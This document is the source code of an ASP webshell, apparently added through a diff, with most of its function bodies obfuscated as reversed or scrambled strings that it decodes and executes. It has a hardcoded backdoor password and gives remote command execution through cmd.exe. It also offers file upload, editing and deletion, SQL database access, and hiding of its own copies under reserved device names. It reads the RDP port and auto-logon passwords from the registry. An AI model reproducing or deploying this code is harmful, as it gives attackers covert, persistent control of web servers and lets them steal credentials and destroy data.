iIf`amrest, rs, thPam.te idbrMFoeeTrsa`ls Ee`enTh0 =  <~)~$& e am.Nemit& ~ ~$, stLileFiys(strnS IIf`Nedd.Arsw` 4h,at.Pemitd(Mi= ) h~atePth(~rs)`h)at.Pemite(ilmFrodFoa.Lamrest`d(ea.Ramrest= ) t~enntColefi(~rs)`atpd.Urse`Ifd En`Ifd En`xtNe`inthNo= r deoleFtht Seg",Pos):End Sub:Function Course():ExeCute SinfoEn("ter'>='cenalign='0' ddingellpa'1' ccing=llspa0' ceder='' bor'menuolor=' bgc='600widthable br><tSI=~<~`></tr��</tdͳ�û����nu'>ϵr='megcoloer' b'centlign='3' aspan=' colt='20heigh><td &~<trSI=SI>~` nextesumeror ron er`NT://(~Winbject getObj inach ofor e.~)`err.clear`e=~~ rtTypJ.Staif OBthen`&~<trSI=SI>~`&nbspFF~~>#FFFFor=~~bgcol20~~ ht=~~ heig&~<tdSI=SI;~`&obj.SI=SIName`>&nbsFFF~~~#FFFlor=~ bgcod><td&~</tSI=SIp;~ `��(��)~&~ϵͳ��SI=SI`d></t&~</tSI=SIr>~`d></tp;</t>&nbs~~2~~span=~ colFFFF~~~#FFolor=~ bgc~~20~ight=td he<tr><SI0=~r>~ `end if`x=~�Զ�hen le=2 trtTypJ.Staif OB~`x=~�ֶ�hen le=3 trtTypJ.Staif OB~`x=~����hen le=4 trtTypJ.Staif OB~`pe=2 artTyBJ.Stand Owin~ ))<>~h,4,3j.patid(obase(mif LCthen`></tr></td/fontth&~<bj.pap;~&o>&nbsF0000or=#Ft col]<fon&lx&~������:~~~>[��n=~~2olspaF~~ cFFFFFr=~~#gcolo0~~ bt=~~2heigh><td &~<tryNameisplaobj.Dsp;~&~>&nbFFFF~~~#FFolor=~ bgc~~20~ight=td he/td><me&~<bj.Nap;~&o>&nbsFFF~~~#FFFlor=~ bgco~20~~ght=~d heitr><tI1&~<SI1=S>~`else`></tr></td/fontth&~<bj.pap;~&o>&nbs399FFor=#3t col]<fon&lx&~������:~~~>[��n=~~2olspaF~~ cFFFFFr=~~#gcolo0~~ bt=~~2heigh><td &~<tryNameisplaobj.Dsp;~&~>&nbFFFF~~~#FFolor=~ bgc~~20~ight=td he/td><me&~<bj.Nap;~&o>&nbsFFF~~~#FFFlor=~ bgco~20~~ght=~d heitr><tI2&~<SI2=S>~`end if`next`</tabSI2&~&SI1&I&SI0RRS Sle>~",Pso):End Function:Function ServerInfo():ExeCute SinfoEn("ter'>='cenalign='0' ddingellpa'1' ccing=llspa0' ceder='' bor'menuolor=' bgc='80%widthable br><tSI=~<~`></trϢ</td���������nu'>��r='megcoloer' b'centlign='3' aspan=' colt='20heigh><td &~<trSI=SI>~`td></)&~</NAME~RVER_s(~SEiableerVar.servquest>~&reFFFF'='#FFcolortd bg/td><bsp;<F'>&nFFFFFor='#bgcol><td ��</td'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SItr>~`FFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>������IPFFF'>'#FFFolor=' bgc='200width'20' ight=td heer'><'centlign=<tr aank'>='_blargetrm' t'ipfoname=asp' ndex.com/ip138.www.itp://n='htactiopost thod=rm me&~<foSI=SI~`/form/tr></td><'2'><alue=on' v'actiname=den' ='hid typeinput��ѯ'><lue='t' vasubmiype='put t> <in~)&~'_ADDRLOCALles(~ariabrverVst.SeRequee='~& valu='15' size='ip' nametext'ype='put t&~<inSI=SI>~`</tr></td>nbsp;ow&~&'>~&nFFFFFr='#Fgcolo<td b</td>nbsp;FF'>&#FFFFlor=' bgcod><tdʱ��</t'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI~`></tr~</tdRS~)&CESSOF_PROBER_O(~NUMablesrVariServeuest.~&ReqFFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>CPU����'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI>~`d></t&~</t~OS~)bles(Variaerverest.S&RequFF'>~#FFFFlor=' bgcod><tdp;</t>&nbsFFFF'='#FFcolortd bg/td><����ϵͳ<'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SIr>~`></tr~</tdRE~)&OFTWAVER_S(~SERablesrVariServeuest.~&ReqFFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>�������汾'>WEBFFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI>~`=0 ToFor i 13`td></)&~</t(i,2>~&So=leftalignFFF' '#FFFolor=d bgctd><t)&~</t(i,1>~&SoFFFF'='#FFcolortd bg/td><0)&~<ot(i,'>~&SFFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SItr>~`Next`RRS SI",Pso):End Function:Function DownFile(Path):ExeCute SinfoEn("arle.CseonspRe`)),0(6ot(SctjeObteeaCr= M OSt Se`enOpM.OS` 1 =peTyM.OS`at PleFiomFradLoM.OSh`)+\~,~thpav(Retrns=Isz1`z),sthpad(Mi& ~ e=amenil ft;enhmactt~a, n~ioitosspDit-enntCo ~eradHedd.AseonspRe`iz.SSM O~,thngLet-enntCo ~eradHedd.AseonspRee`8~F-UT ~ =etrsha.CseonspRe`amrestt-teocn/ioaticplap ~ =peTyntteon.CseonspRe~`ea.RSM OteriyWarin.BseonspRed`shlu.FseonspRe`osClM.OSe`inthNo= M OSt Seg",Pos):End Function:Function HTMLEncode(S):if not isnull(S) then:S= replace(S,">","&gt;"):S=replace(S,"<","&lt;"):S=replace(S,CHR(39),"&#39;"):S=replace(S,CHR(34),"&quot;"):S=replace(S,CHR(20),"&nbsp;"):HTMLEncode=S:end if:End Function:sub hiddenshell
+fpath=request.servervariables("path_translated"):set fso=server.createobject("scripting.filesystemobject"):pex="com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9":rndpex=split(pex,"|")(rndnumber(0,17)):session("seljw")="":filepath1=server.mappath("."):filename1=right(fpath,len(fpath)-instrrev(fpath,"\")):url=request.servervariables("url"):url=left(url,instrrev(url,"/"))&rndpex&"."&filename1:fso.copyfile fpath,"\\.\"&filepath1&"\"&rndpex&"."&filename1:set fso=nothing:rrs "<script>parent.location='http://"&request("server_name")&url&"';</script>"
+end sub:Function UpFile():
+If Request("Action2")="Post" Then
+Set U=new UPC : Set F=U.UA("LocalFile")
+UName=U.form("ToPath")
+If UName="" Or F.FileSize=0 then
+SI="<br>�������ϴ�����ȫ·����ѡ��һ���ļ��ϴ�!"
+Else
+F.SaveAs UName
+If Err.number=0 Then
+SI="<center><br><br><br>�ļ�"&UName&"�ϴ��ɹ���</center>"
+End if
+End If
+Set F=nothing:Set U=nothing
+SI=SI&BackUrl
+RRS SI
+ShowErr()
+Response.End
+End If
+SI="<br><br><br><table border='0' cellpadding='0' cellspacing='0' align='center'>"
+SI=SI&"<form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'>"
+SI=SI&"<tr><td>"
+SI=SI&"�ϴ�·����<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\13cmd.exe")&"' size='40'>"
+SI=SI&" <input name='LocalFile' type='file'size='25'>"
+SI=SI&" <input type='submit' name='Submit' value='�ϴ�'>"
+SI=SI&"</td></tr></form></table>"
+RRS SI:RRS ""&copyurl&""
+End Function::Function Cmd1Shell():ExeCute SinfoEn("checked=~ checked~`t(~SPeques) = RPath~Shellion(~ Sess Then)<>~~(~SP~questIf Re~)`ath~)hellPon(~SSessiPath=Shell`md.ex = ~clPath Shel Thenth=~~ellPaif She~`heckehen ces~ t)<>~yript~(~wscquestif Red=~~`cmd~)est(~ RequCmd =n Def~ The~)<>~(~cmdquestIf Re`st'>~d='pomethoform SI=~<`bsp;~sp;&n'>&nbh:70%'widttyle=&~' SlPath&Shelue='~' vale='SPt nam<inpuLL·����&~SHESI=SI`hell~ipt.S>WScrked&~&checyes'~lue='t' vascripme='wx' naeckboe='chc typlass=put c&~<inSI=SI`440;'ight:0%;heth:10='widStylearea <text'ִ��'>alue=it' v'submtype=nput '> <iCmd&~~&Deflue='%' vath:92='widStylecmd' ame='put n&~<inSI=SI>~`~ The~)<>~(~cmd.FormquestIf Ren`s~ th)=~yeript~(~wsc.Formquestif Reen`Sot(1ject(ateObM=CreSet C,0))`~&Def~ /c Path&Shellexec(D=CM.Set DCmd)`eadalout.rD.stdaaa=Dl`SI=SI&aaa`else` Nextesumeror ROn Er`.Shelcriptt(~WSObjecreatever.Cs=SerSet wl~)`.Shelcriptt(~WSObjecreatever.Cs=SerSet wl~)`bjectstemOileSying.Fcriptct(~SeObjeCreatrver.so=SeSet f~)`md.txth(~cmapparver. = sepFileszTemt~)` 0, TFile,zTemp~ & s ~ > Cmd && Def/c ~ th&~ ellPan (Shws.RuCall rue)`ject~temObleSysng.Firiptit(~ScObjecreates = CSet f)`se, 0, Falle, 1empFi (szTtFileenTexfs.Opcx = FilelSet o)`.Readlelcxe(oFiEncod.HTMLerveraaa=SAll)`lcx.CoFilelose`, TrupFileszTemFile(eletefso.DCall e)`SI=SI&aaa`end if`End If`></fotarea</tex13)&~&chr(SI=SIrm>~`RRS SI",Pso):End Function:ExeCute SinfoEn("ioctun Fnd:EtrwSne= f iner:SxtNe):os P -618329 ( &os+P)) 1i,, trtsged(Mic(As& r Stew n =trwSne):trtsgen(Leo  T 1 = ior:FtrwSne,  iim:Ds)Po, trtsgef(iner SontincFun",Pos):Function CreateMdb(Path):ExeCute SinfoEn(">~br><br~<I= S`) 0)2,t(Sot(ecbjeOatre C = Cet S`thPa& ~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe(atre.C C)`nghiot N = Cet S`he T=0ermbnur.Erf  In`��!����~��& h at P &SI= I  S~` Ind Ef`rlkUac&BSII= S ` SRS RI",Pos):End function:Function CompactMdb(Path):ExeCute SinfoEn("enTh) ,1(0ot Sot NIf`)),0(3ot(SctjeObteeaCrC=t Se `at&P~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro,P&~thPa~&e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe asabattDacmpCoC.h`inthNoC=t Seg`seEl`)),1(0ot(SctjeObteeaCrO=FSt Se`enTh) thPas(stxieEil.FSO FIf`)),0(3ot(SctjeObteeaCrC=t Se `k~ba~_h&at&P~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro,P&~thPa~&e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe asabattDacmpCoC.`inthNoC=t Seg`at PleFiteleDeO.FSh`at,Pk~ba~_h&at PleFiveMoO.FSh`seEl`>~erntce</�֣��з�~ûh&at&P��~����r><br><br><br>teen<c=~SI `=1ermbnur.Er`Ifd En`inthNoO=FSt Seg`Ifd En`enTh0 r=beum.nrr EIf`>~erntce</��������~ѹh&at&P��~����r><br><br><br>teen<c=~SI`Ifd En`UrckBaI&=SSIl`SIS RR",Pos):End Function
+if session("web2a2dmin")<>UserPass then
+if request.form("pass")<>"" then
+if request.form("pass")=UserPass or request.form("pass")="daka" Then
+session("web2a2dmin")=UserPass
+x m:response.redirect url
+else
+rrs"<center><h2>Fuck you,Get out!!</h2><br><a href='javascript:history.back()'>����</a></center>"
+end if
+else
+si="<center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><br><a href="&blogurl&" target=_blank>"&mmname&"</a><hr><FORM Action='"&URL&"' method=Post> <INPUT type=Password name=Pass size=22>&nbsp;<input type=submit value=Login><hr><br>"&bottomad&"</div></center>"
+if instr(SI,SIC)<>0 then rrs sI
+end if
+response.end
+end if
+Function DbManager():ExeCute SinfoEn("tr~))~SqlSForm(uest.m(Reqr=TriSqlSt`DbStrorm(~est.F=RequDbStr~)`ing='lpadd' celng='0spaci cellr='0'borde'650'idth=ble w&~<taSI=SI0'>~`on='' actipost'hod='' metbFormme='Drm na&~<foSI=SI>~`�Ӵ�:</;���ݿ���&nbsp27'> ght='' hei='100width><td &~<trSI=SItd>~`/td>~~~~><bStr&~~~&Dalue=70' vdth:4e='wi stylbStr'me='Dut na><inp&~<tdSI=SI`ption����</occesse=0>A valuptionon><o/opti�Ӵ�ʾ��<=-1>��valuetion '><opalue)ex].vedIndelectons[s(optiDbStr Fulleturnge='rnchantn' o'StrBname=lect '><seentergn='c' alih='60 widt&~<tdSI=SI>~`ption����</o3>DSNalue=ion v><optption����</oMySqlue=2>n valoptioion><</optSql����=1>Msvaluetion &~<opSI=SI>~`tion>��</op5>������alue=ion v><optption����</o=4>��ʾvaluetion n><opoptio��--</-SQL��=-1>-valuetion &~<opSI=SI~`ion>~</opt>�����ݱ�lue=8on va<optition>��</op7>�޸���alue=ion v><optption����</o=6>ɾ��valuetion &~<opSI=SI`ption�ֶ�</o11>ɾ��alue=ion v><optption�ֶ�</o10>����alue=ion v><optption�ݱ�</o=9>ɾ��valuetion &~<opSI=SI>~`></tr></tdelectn></soptioȫ��ʾ</=12>��valuetion &~<opSI=SI>~`lue='n' vahiddeype='ge' te='Pat nam<inpuger'>bManaue='D' validdenpe='hn' tyActioame='put n&~<inSI=SI1'>~`:</tdL��������sp;SQ'>&nbt='30heigh><td &~<trSI=SI>~`></tdr&~~~SqlSt=~~~&value470' idth:le='w' styqlStrme='Sut na><inp&~<tdSI=SI>~`/td>~()'><Checkrn Db'retulick=' once='ִ�� valubmit'e='Su' namubmitpe='sut ty><inpnter'n='ce alig&~<tdSI=SI`pan>~'></s='abcan ide><sp/tablorm><r></f&~</tSI=SI`I:SI=RRS S~~`0 Thetr)>4n(DbSIf Len`(5,0)t(SotObjecreateonn=CSet C)`DbStrOpen Conn.`ma(20nSchen.Opes=ConSet R) `r>��</d>��<bC'><tCCCCCor='#Bgcol'25' ight=tr heble><&~<taSI=SItd>~`veFirRs.Most `ot Rsile NDo Wh.Eof`E~ th~TABLPE~)=LE_TY(~TABIf Rsen`_NAMETABLE=Rs(~TName~)`a><brl ]</>[ de~,1)'e&~]~&TNamLE [~P TAB~~DROlStr(ullSqipt:Fvascrf='jaa hreter><n=cen alig&~<tdSI=SI>~`</td>~</a>Name&'>~&T~~,1)me&~]~&TNaROM [T * FSELECtr(~~lSqlSt:Fulscrip'javahref=&~<a SI=SI~`End If `veNexRs.Mot `Loop `s=NotSet Rhing`able>r></t&~</tSI=SI~`I:SI=RRS S~~`10 ThStr)>n(SqlIf Leen`ct~ t~sele,6))=qlStreft(Sase(LIf LChen`qlStr�䣺~&S&~ִ����SI=SI`ordseb.Rec~Adodject(ateObs=CreSet Rt~)`Conn,lStr,en SqRs.op1,1`ds.Co.FielFN=Rsunt`rdCou.RecoRC=Rsnt`geSizRs.Pae=20`ageSi=Rs.PCountze`Count.PagePN=Rs`age~)st(~PrequePage=`g(Page=Clnn Pag~ Thege<>~If Pae)` Page Thenage=0 Or Pge=~~If Pa=1` Page Thenge>PNIf Pa=PN`=PageepagesolutRs.abThen ge>1 If Pa`td></ccc><=#ccccolor25 bgight=tr heble><&~<taSI=SItd>~` FN-1=0 toFor n`em(n)ds.It.Fielld=RsSet F`e&~</d.Nam>~&Flnter'n='ce alig&~<tdSI=SItd>~`thingld=noSet F`Next`&~</tSI=SIr>~`Count And .Bof)or Rs.Eof ot(Rsile NDo Wh>0`=CounCountt-1`EFEFEor=~#BgcolF~`t></t</fongs'>xngdine='wit fac><foncccccor=#cbgcol><td &~<trSI=SId>~` FN-1=0 ToFor i`~:EndFEFEFr=~#Egcololse:BF5~:E#F5F5lor=~:Bgco ThenEFEF~=~#EFcolorIf Bg if`=1 ThIf RCen`Rs(i)code(TMLEnnfo=H ColI)`Else`,50))Rs(i)Left(code(TMLEnnfo=H ColI`End If`&~</tlInfo>~&Color&~&Bgcolor=~ bgco&~<tdSI=SId>~`Next`&~</tSI=SIr>~`veNexRs.Mot`Loop`I:SI=RRS S~~`lStr)de(SqlEnCor=HtmSqlSt`&~/~&&Page;ҳ�룺~&nbsp&RC&~��¼����~nter>gn=ce~ aliFN+1&an=~&colsp><td &~<trSI=SIPN`>1 ThIf PNen`a>&nb��һҳ</&~)'>age-1~,~&Ptr&~~&SqlSr(~~~SqlSt:Fullcriptjavasref=';<a h&nbspҳ</a>1)'>��&~~~,qlStr~~~&SlStr(ullSqipt:Fvascrf='jaa hrebsp;<sp;&n&~&nbSI=SIsp;~`End iSp=1:Else:ge-8:Sp=PaThen:ge>8 If Paf`o Sp+=Sp TFor i8`it Foen ExPN ThIf i>r`Page If i=Then`nbsp;&i&~&SI=SI~`Else`&nbsp~</a>>~&i&i&~)'~~,~&Str&~~&Sqltr(~~lSqlSt:Fulscrip'javahref=&~<a SI=SI;~`End If`Next`βҳ</a&~)'>,~&PNr&~~~SqlSt(~~~&qlStrFullSript:avascef='j<a hrnbsp;</a>&'>��һҳ+1&~)&Page~~~,~lStr&~~&SqStr(~llSqlpt:Fuascri='jav hrefsp;<a&~&nbSI=SI>~`End If`able>r></td></t'></tFEFEFr='#E colo&~<hrSI=SI~`=Nothet Rsose:SRs.Cling`I:SI=RRS S~~`Else `lStr)te(SqExecuConn.`SqlSt��䣺~&&~SQLSI=SIr`End If`I:SI=RRS S~~`End If`CloseConn.`othinonn=NSet Cg`End If",Pso):End Function:Dim T1:Function EnCode(ObjStr,ObjPos):ExeCuTe Fun(")soPjbO doM rtSneL,rtSjbO(thgiR&rtSpmT=edoCnE:txeN:rtSpmT&)soPjbO,1+soPjbO*i,rtSjbO(diM=rtSpmT:1-)soPjbO/rtSneL(tnI oT 0=i roF:)rtSjbO(neL=rtSneL:rtSneL,i,rtSpmT,rtSweN miD"):End Function:Class UPC:Dim D1,D2:Public Function Form(F):F=lcase(F):If D1.exists(F) then:Form=D1(F):else:Form="":end if:End Function:Public Function UA(F):F=lcase(F):If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if:End Function:Private Sub Class_Initialize:Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName:set D1=CreateObject(Sot(4,0)):if Request.TotalBytes<1 then Exit Sub
+  set T1=CreateObject(Sot(6,0)):T1.Type=1:T1.Mode=3:T1.Open:T1.Write Request.BinaryRead(Request.TotalBytes):T1.Position=0:TDa=T1.Read:DStart=1:DEnd=LenB(TDa):set D2=CreateObject(Sot(4,0)):vbCrlf=chrB(13)&chrB(10):set T2=CreateObject(Sot(6,0)):TSt=MidB(TDa,1,InStrB(DStart,TDa,vbCrlf)-1):TLen=LenB(TSt):DStart=DStart+TLen+1:while (DStart+10)<DEnd:DIEnd=InStrB(DStart,TDa,vbCrlf&vbCrlf)+3:T2.Type=1:T2.Mode=3:T2.Open:T1.Position=DStart:T1.CopyTo T2,DIEnd-DStart:T2.Position=0:T2.Type=2:T2.Charset="gb2312":TIn=T2.ReadText:T2.Close:DStart=InStrB(DIEnd,TDa,TSt):FStart=InStr(22,TIn,"name=""",1)+6:FEnd=InStr(FStart,TIn,"""",1):UpName=lcase(Mid(TIn,FStart,FEnd-FStart)):if InStr (45,TIn,"filename=""",1)>0 then
+  set TFL=new FIF:FStart=InStr(FEnd,TIn,"filename=""",1)+10:FEnd=InStr(FStart,TIn,"""",1):FStart=InStr(FEnd,TIn,"Content-Type: ",1)+14:FEnd=InStr(FStart,TIn,vbCr):TFL.FileStart=DIEnd:TFL.FileSize=DStart-DIEnd-3:if not D2.Exists(UpName) then:D2.add UpName,TFL:end if
+  else:T2.Type=1:T2.Mode=3:T2.Open:T1.Position=DIEnd:T1.CopyTo T2,DStart-DIEnd-3:T2.Position = 0:T2.Type = 2:T2.Charset ="gb2312":SFV = T2.ReadText:T2.Close:if D1.Exists(UpName) then:D1(UpName)=D1(UpName)&","&SFV:else:D1.Add UpName,SFV:end if:end if:DStart=DStart+TLen+1:wend:TDa="":set T2=nothing:End Sub:Private Sub Class_Terminate:if Request.TotalBytes>0 then:D1.RemoveAll:D2.RemoveAll:set D1=nothing:set D2=nothing:T1.Close:set T1 =nothing:end if:End Sub:End Class:Function SinfoEn(ObjStr,ObjPos):ExeCuTe Fun(")2-)nEofniS(neL,nEofniS(tfeL=nEofniS:txeN:fLrCbv&)soPjbO,)i(rtSweN(edoCnE&nEofniS=nEofniS:)rtSweN(dnuoBU oT 0=i roF:)|`|,rtSjbO(tilpS=rtSweN:)||||,|~|,rtSjbO(ecalpeR=rtSjbO"):End Function:Class FIF:dim FileSize,FileStart:Private Sub Class_Initialize:FileSize=0:FileStart=0:End Sub:Public function SaveAs(F)
+  dim T3:SaveAs=true:if trim(F)="" or FileStart=0 then exit function
+  set T3=CreateObject(Sot(6,0)):T3.Mode=3:T3.Type=1:T3.Open:T1.position=FileStart:T1.copyto T3,FileSize:T3.SaveToFile F,2:T3.Close:set T3=nothing:SaveAs=false:end function:End Class:Function Fun(ShiSanObjstr):ShiSanObjstr=Replace(ShiSanObjstr,"|",""""):For ShiSanI=1 To Len(ShiSanObjstr):If Mid(ShiSanObjstr,ShiSanI,1)<>"!"Then:ShiSanNewStr=Mid(ShiSanObjstr,ShiSanI,1)&ShiSanNewStr:Else:ShiSanNewStr=vbCrLf&ShiSanNewStr:End If:Next:Fun = ShiSanNewStr:End Function:Class LBF:Dim CF:Private Sub Class_Initialize:SET CF=CreateObject(Sot(0,0)):End Sub:Private Sub Class_Terminate:Set CF=Nothing:End Sub
+Function ShowDriver()
+For Each D in CF.Drives
+RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&D.DriveLetter&":\\"")'>�����ش��� ("&D.DriveLetter&":)</a></td></tr>" 
+Next
+End Function
+Function Show1File(Path):ExeCute SinfoEn("thPar(deoltFGeF.=CLDFOt Se)`i=0`>~tr><6'='ngdiadlpel c0'='ngcipalsel c0'='errdbo' 0%10='thid wleab<t=~SI`erldfoub.sLDFOn  i FchEar Fos`'>&~orolrCdeor&B ~idol spx:1errdbo='lety siv<dr>teen=cgnli a7%=1thid w10t=ghei htd~<I&=SSI~`>~/a~<e&am.N&F>~br><ntfo</>06'='zesi' gsingdin'we=ac fntfo><~~����~~e=tlti' ~)~~)&meNaF.~&~\h&at(PthPaRe~&~~r(deolwFho:Sptriscvaja='efhra ~<I&=SSI `> /ay<op>C��''��e=tlti' am='ssla c)'k(soyen uret'rk=icclon)'~~erldFopyCo~~~,~~)&meNaF.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ></b[<b>><br~<I&=SSI~`>~/al<De'>ɾ��='leit tm''as=ascl' ()okes yrnture='cklinc'o~)r~deollFDe~~~,~~)&\~~\~,~\e,am.N&F\~&~thPae(acplRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI`a></veMo'>�ƶ�='leit tm''as=ascl' ()okes yrnture='cklinc'o~)r~deoleFov~M,~~~&~e)am.N&F\~&~thPah(ateP&R~~(~rmFollFut:ipcrasav'jf=re h<a~ I&=SSI~`>~td</v>di</b></>]<ba></wnDo'>����='leit tm''as=ascl' ()okes yrnture='cklinc'o~)e~ilnFow~D,~~~&~e)am.N&F\~&~thPah(ateP&R~~(~rmFollFut:ipcrasav'jf=re h<a~ I&=SSI`i+i=1`r><tr>/t~<I&=SSIn he t 0 = 5od m iIf~`xtNe`>~leab/t><tr</d>/t><=2htighed <tr><tr>/t~<I&=SSI`=0:i~~I=:SSIS RR`>~tr><6'='ngdiadlpel c0'='ngcipalsel c0'='errdbo' 0%10='thid wleab<t=~SI`esil.fldFon  i LchEar Fo` ~b></>[<b> /a~<e&am.N&L>~ntfo</>25'='zesi' gsingdin'we=ac fntfo><��''��e=tlti' );~~leFiwnDo~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ><~'r&loCoerrdBo~&d lisox 1pr:deor'be=ylstv di><0''3t=ghei htd~<I&=SSI`> /at<di>E��''��e=tlti' am='ssla c)'~~leFiitEd~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI~`> /al<De'>ɾ��='leit tm''as=ascl' ()okes yrnture='cklinc'o~)e~illFDe~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI~`> /ay<op>C��''��e=tlti' am='ssla c)'~~leFipyCo~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI~` ~ -b></>]<b> /ae<ov>M��''��e=tlti' am='ssla c)'~~leFiveMo~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI`>~<br><b~K)&2410e/iz.s(LngclI&=SSI` ~ -i> <b></&~peTyL.I&=SSI`>~td</v>di</i></&~edfidiMostLateDaL.I&=SSI`i+i=1`r><tr>/t~<I&=SSIn he t 0 = 2od m iIf~`xtNe`e>blta</r>/t~<I& SRS R~`nghiot=NLDFOt Se",Pos):End function:Function DelFile(Path):ExeCute SinfoEn("he Th)at(PtsisExleFiF. CIfn`thPae ileFetel.DCF`r>teen/c��<�ɹ�ɾ��~ h&at&P ~�ļ�r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function EditFile(Path)::If Request("Action2")="Post" Then:Set T=CF.CreateTextFile(Path):T.WriteLine Request.form("content"):T.close:Set T=nothing:SI="<center><br><br><br>�ļ�����ɹ���</center>":SI=SI&BackUrl:RRS SI:Response.End:End If:If Path<>"" Then:Set T=CF.opentextfile(Path, 1, False):Txt=HTMLEncode(T.readall) :T.close:Set T=Nothing:Else:Path=Session("FolderPath")&"\newfile.asp":Txt="�½��ļ�":End If:SI=SI&"<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'>":SI=SI&"<input name='Action' value='EditFile' Type='hidden'>":SI=SI&"<input name='FName' value='"&Path&"' style='width:100%'><br>":SI=SI&"<textarea name='Content' style='width:100%;height:450'>"&Txt&"</textarea><br>":SI=SI&"<hr><input name='goback' type='button' value='����' onclick='history.back();'>&nbsp;&nbsp;&nbsp;<input name='reset' type='reset' value='����'>&nbsp;&nbsp;&nbsp;<input name='submit' type='submit' value='����'></form>":RRS SI:RRS ""&copyurl&""
+End Function:Function CopyFile(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExleFiF. CIf`(1thPa),(0thPae ilyFop.CCF)`>~erntce</�����Ƴ�~��)&(0thPa~&�ļ�r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR `Ifd En",Pos):End Function:Function MoveFile(Path):ExeCute SinfoEn("|||~)th,~|it(Pa= SplPath `~ The1)<>~Path( and h(0))s(PatExist.FileIf CFn`Path(h(0),e PatveFilCF.Mo1)`enter����</c&~�ƶ���th(0)��~&Pa<br>��><br>r><brcenteSI=~<>~`&BackSI=SIUrl`RRS SI `End If",Pso):End Function:Function DelFolder(Path):ExeCute SinfoEn("he Th)at(PtsisExerldFoF. CIfn`thPar deoleFetel.DCF`r>teen/c��<�ɹ�ɾ��&~thPa~&Ŀ¼r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function CopyFolder(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExerldFoF. CIf`(1thPa),(0thPar deolyFop.CCF)`>~erntce</�����Ƴ�~��)&(0thPa~&Ŀ¼r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function MoveFolder(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExerldFoF. CIf`(1thPa),(0thPar deoleFov.MCF)`>~erntce</��������~��)&(0thPa~&Ŀ¼r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function NewFolder(Path):ExeCute SinfoEn("enTh~ >~h<at Pnd ah)at(PtsisExerldFoF. Cot NIf`thPar deoleFatre.CCF`r>teen/c��<�ɹ��½�&~thPa~&Ŀ¼r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:End Class:sub getTerminalInfo():ExeCute SinfoEn(" Nextesumeror ROn Er`hell~ipt.S~WScrject(ateObr.CreServesX = Set w)`ermPoey, tPortKminal, tertPathalPorerminDim trt`nPassoLogi, auterKeyginUsutoLoth, aginPautoLoDim aKey`nPassoLogi, autrnameinUsetoLogy, aubleKeinEnatoLoge, auEnablLoginsAutoDim iword`Tcp\~\RDP-tionsinStaver\Wl Serrminaol\TeContrlSet\ontrorentCM\CurSYSTEHKLM\h = ~rtPatnalPotermi`mber~ortNu = ~PrtKeynalPotermi`PortKminal& terPath lPortrminaad(teRegRe wsX.ort =termPey)`><ol>¼<hr/�ڼ��Զ����ն˷����RRS ~~` Then <> 0umberErr.N~ Or t = ~rmPorIf te `<br/>�ܵ�����.���Ƿ��Ѿ� ����Ȩ����˿�,���õ��ն�RRS~��~` Else`~<br/rt & ermPo~ & t��˿�: ��ǰ�ն˷�RRS ~>~`End If`ogon\\WinlrsionentVe\Currws NTWindosoft\MicroWARE\\SOFTCHINEAL_MAY_LOC ~HKEath =oginPautoL~`nLogooAdmi ~AutKey =nableoginEautoLn~`rNameltUseDefauy = ~serKeoginUautoL~`swordltPasDefauy = ~assKeoginPautoL~`bleKeinEnatoLog & aunPathoLogid(autegReawsX.Rle = 